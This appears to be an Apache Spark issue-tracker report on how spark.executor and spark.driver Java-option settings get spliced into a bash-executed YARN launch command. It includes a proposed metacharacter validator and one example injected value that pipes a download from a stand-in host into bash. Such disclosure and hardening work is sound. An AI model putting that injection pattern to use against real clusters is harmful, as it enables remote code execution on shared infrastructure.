SPARK-50142: Unusual parameter behavior


Details

    • Type: Improvement
    • Status: Open
    • Priority: Critical
    • Resolution: Unresolved
    • Affects Version/s: 3.5.3
    • Fix Version/s: None
    • Component/s: Spark Submit
    • Labels: None

    Description

      The configuration parameters of a Spark job submitted via spark-submit should not be parsed into commands, but some of them are: spark.executor.extraJavaOptions, spark.executor.defaultJavaOptions, spark.driver.extraJavaOptions, and spark.driver.defaultJavaOptions. These parameters are spliced directly into the launch command, and in YARN mode that command is executed through a shell (bash -c "xxxx").

      For example, spark.executor.extraJavaOptions is spliced directly into the executor launch command in resource-managers/yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala:

      private def prepareCommand(): List[String] = {
        // Extra options for the JVM
        val javaOpts = ListBuffer[String]()

        // Set the JVM memory
        val executorMemoryString = executorMemory + "m"
        javaOpts += "-Xmx" + executorMemoryString

        // Set extra Java options for the executor, if defined
        sparkConf.get(EXECUTOR_JAVA_OPTIONS).foreach { opts =>
          val subsOpt = Utils.substituteAppNExecIds(opts, appId, executorId)
          javaOpts ++= Utils.splitCommandString(subsOpt).map(YarnSparkHadoopUtil.escapeForShell)
        }
        // ...
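      To make the risk concrete, here is a minimal, self-contained sketch of the pattern the snippet above implements. This is not the actual Spark code; all names in it are illustrative assumptions.

      object SpliceSketch {
        def main(args: Array[String]): Unit = {
          // A value a user could pass via --conf spark.executor.extraJavaOptions=...
          val extraJavaOptions = "-verbose:gc -XX:+PrintGCDetails"

          // Rough analogue of building the executor launch command: the option
          // string is split on whitespace and spliced into the argument list.
          val javaOpts = extraJavaOptions.split("\\s+").toList
          val command = ("java" :: "-Xmx1024m" :: javaOpts) :+ "ExecutorBackend"

          // In YARN mode the joined string is ultimately run through a shell
          // (bash -c "..."), so any character the escaping misses is
          // interpreted by bash rather than treated as data.
          println("bash -c \"" + command.mkString(" ") + "\"")
        }
      }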

       

      From a security perspective, data and code (commands) should be handled separately, yet these parameters can end up being executed as commands. A suggestion for this issue: validate these parameters before they are spliced into the launch command, to enhance security.
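      As a rough sketch of what such validation could look like (the metacharacter set and names below are assumptions, not a proposed Spark API), one option is to reject values containing shell metacharacters before they reach the launch command:

      object JavaOptionsValidator {
        // Characters bash treats specially; a legitimate JVM flag rarely needs them.
        private val ShellMetaChars: Set[Char] =
          Set(';', '&', '|', '`', '$', '(', ')', '<', '>', '\n')

        /** Returns Left with the offending characters, or Right(opts) if clean. */
        def validate(opts: String): Either[String, String] = {
          val bad = opts.filter(ShellMetaChars.contains).distinct
          if (bad.nonEmpty) Left(s"disallowed shell metacharacters: $bad")
          else Right(opts)
        }
      }

      With such a check, an ordinary flag like "-XX:+UseG1GC" passes through, while a value such as "-Xmx2g; curl evil.example | bash" is rejected before any command is assembled.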

       


      People

        Assignee: Unassigned
        Reporter: youngseaz
        Votes: 0
        Watchers: 2
